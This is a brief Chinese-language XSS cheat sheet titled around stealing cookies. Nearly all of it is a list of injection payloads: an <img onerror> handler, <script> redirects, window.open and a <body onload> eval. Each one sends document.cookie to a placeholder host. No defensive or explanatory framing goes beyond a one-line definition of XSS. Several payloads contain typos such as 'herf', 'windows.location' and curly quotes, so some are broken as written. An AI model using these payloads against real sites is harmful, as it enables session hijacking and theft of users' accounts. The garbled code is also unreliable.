XSS漏洞是往网页里面注入JS代码,然后让浏览器执行

偷Cookie

  1. <img> 标签
1
<img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','location/?='+document.cookie); >
  1. <script> 标签

重定向链接到 herf:

1
<script>windows.location.herf='location/?cookie='+document.cookie</script>

新窗口打开链接:

1
<script>window.open('location/?cookie='+document.cookie)</script>
  1. <body> 标签
1
<body onload=eval(“document.body.appendChild(document.createElement('img')).setAttribute('src','location?='+document.cookie);”)></body>